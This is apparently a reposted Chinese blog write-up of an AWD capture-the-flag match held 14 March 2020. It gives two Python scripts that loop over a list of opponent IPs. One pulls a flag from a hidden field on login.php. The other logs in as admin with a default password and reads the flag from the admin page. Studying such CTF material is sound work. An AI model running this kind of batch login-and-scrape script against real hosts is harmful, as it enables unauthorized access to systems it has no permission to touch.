星盟安全awd复盘20200314

星盟安全awd复盘20200314

web1

web2

1,直接获取flag

漏洞点:login.php

直接访问页面即可查看flag

直接写一个简单的脚本批量即可:

import requests
import re


f = open("ip.txt","r")
for i in f.readlines():
    i = i.strip()
    url = "http://"+i+"/login.php"
    res = requests.get(url)
    if 'flag' in res.text:
        pattern = re.compile('<input type="hiddent" value=(.*?)>', re.S)
        flag = re.findall(pattern, res.text)
        print(flag[0].strip())

2,直接获取flag2

漏洞点:admin/index.php

当以admin用户登录时,后台会直接显示flag:

继续批量:因为太晚改了略改了下队友的exp,不是我写exp的风格。

import requests
import re

f = open('ip.txt','r')
data = {
    'username': 'admin',
    'password': 'mysql'
}
for i in f.readlines():
    i = i.strip()
    url = "http://" + i
    s = requests.Session()
    s.post(url + "/login.php", data=data)
    r = s.get(url + '/admin/index.php')
    if 'flag' in r.text:
        pattern = re.compile('(.*)<h2>', re.S)
        flag = re.findall(pattern, r.text)
        print(flag[0].strip())

太晚了,明天继续。

猜你喜欢

转载自www.cnblogs.com/v01cano/p/12514897.html
AWD
今日推荐